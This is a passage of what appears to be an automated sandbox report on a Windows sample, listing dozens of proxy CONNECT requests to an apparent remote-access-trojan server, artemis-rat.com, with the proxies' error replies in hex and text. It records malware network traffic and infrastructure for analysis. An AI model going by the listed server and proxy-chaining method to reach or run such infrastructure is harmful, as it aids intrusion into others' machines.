                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014703035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1035192.168.2.552807185.238.228.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.870381117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.026665926 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1036192.168.2.55277623.231.34.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.879628897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.071126938 CET401INHTTP/1.0 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="login"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1037192.168.2.5527428.213.128.904443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.882169962 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1038192.168.2.552156162.253.68.9741453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.884237051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1039192.168.2.55064151.158.96.66163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.886161089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.742512941 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1040192.168.2.550662171.244.140.160270563876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.891829967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996813059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014667988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1041192.168.2.5507505.252.23.24910803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.912838936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092350006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093231916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1042192.168.2.552741103.118.44.6180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.915467978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1043192.168.2.552299221.151.181.10180003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.923662901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092407942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093859911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.092979908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1044192.168.2.552342139.224.64.19180813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.926528931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.254502058 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1045192.168.2.550749188.215.245.235803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.929285049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092415094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093899965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.093014956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1046192.168.2.552323181.115.207.11510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.933646917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1047192.168.2.550664148.72.206.84306513876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.936677933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1048192.168.2.550759208.109.14.49373773876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.936753035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092639923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093862057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.093007088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1049192.168.2.552748181.12.80.21120003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.937097073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1050192.168.2.552843107.180.103.214132863876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.946494102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498675108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
